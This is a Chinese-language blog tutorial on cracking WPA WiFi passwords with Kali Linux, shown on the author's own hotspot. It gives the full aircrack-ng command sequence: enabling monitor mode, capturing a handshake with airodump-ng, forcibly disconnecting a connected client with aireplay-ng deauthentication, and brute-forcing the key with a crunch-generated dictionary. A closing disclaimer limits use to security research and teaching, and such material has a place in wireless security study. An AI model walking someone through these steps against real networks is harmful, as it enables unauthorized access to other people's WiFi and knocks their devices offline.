对Kali Linux的学习也有段时间了,之前主要集中在Web层面的一些应用。最近对无线Hacker比较感兴趣,包括WiFi破解、Kali实现钓鱼WiFi以及GSM嗅探等。今天先分享下Kali下面破解WiFi的一个简明教程吧!
环境:Kali Rolling/Kali2016.1 (WMware 11)
设备: Ralink 802.11 n WLAN(淘宝即可购得,新版kali兼容大量无线网卡驱动,找一款能兼容的外置无线网卡即可)
所需软件:aircrack(自带)
0x01 开始前的准备
首先把外置无线网卡插入电脑,然后加载入当前kali虚拟机。完成后用ifconfig命令查看无线网卡是否安装成功:如图wlan0
并将wlan0网卡开启混杂模式:
airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill
airmon-ng start wlan0
0x02 开始抓取握手包
-
选取其中信号较好的WiFi热点,在这里我直接用我的WiFi热点做演示(4227X)
3.使用airodump-ng对选取的WiFi热点进行cap监听与获取:
airodump-ng -c 11 --bssid EC:26:CA:34:OA:2C -w 4227X wlan0mon
-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名
wlan0mon 启用混杂模式的网卡名
- 可以看到4227X这个WiFi热点下有7个设备正在连接中,选取其中一个你喜欢的,进行断网从而抓取之握手包:
aireplay-ng -0 20 -c 64:5A:04:34:5A:0A -a EC:26:CA:34:OA:2C wlanmon
-0 death模式,20为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC
如图,可以看到握手包已经抓取到了,接下来就是破解操作了!
0x03 暴力破解
1.首先需要一个字典,可以找网上现成的,或者用工具生成一个字典,这里我们用crunch生成一个简单字典:
2.开始跑握手包
#首先ls查看当前目录所产生的握手包
aircrack-ng -w die.txt 4227X-01.cap
- 字典的设置还是比较关键的!当出现Key Found 的时候表明你成功了!
![QQ截图20160829233329.png]()
本文出自0h1in9e's Blog , 链接:https://www.ohlinge.cn,非商业转载请注明作者及出处,商业转载请联系作者本人。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论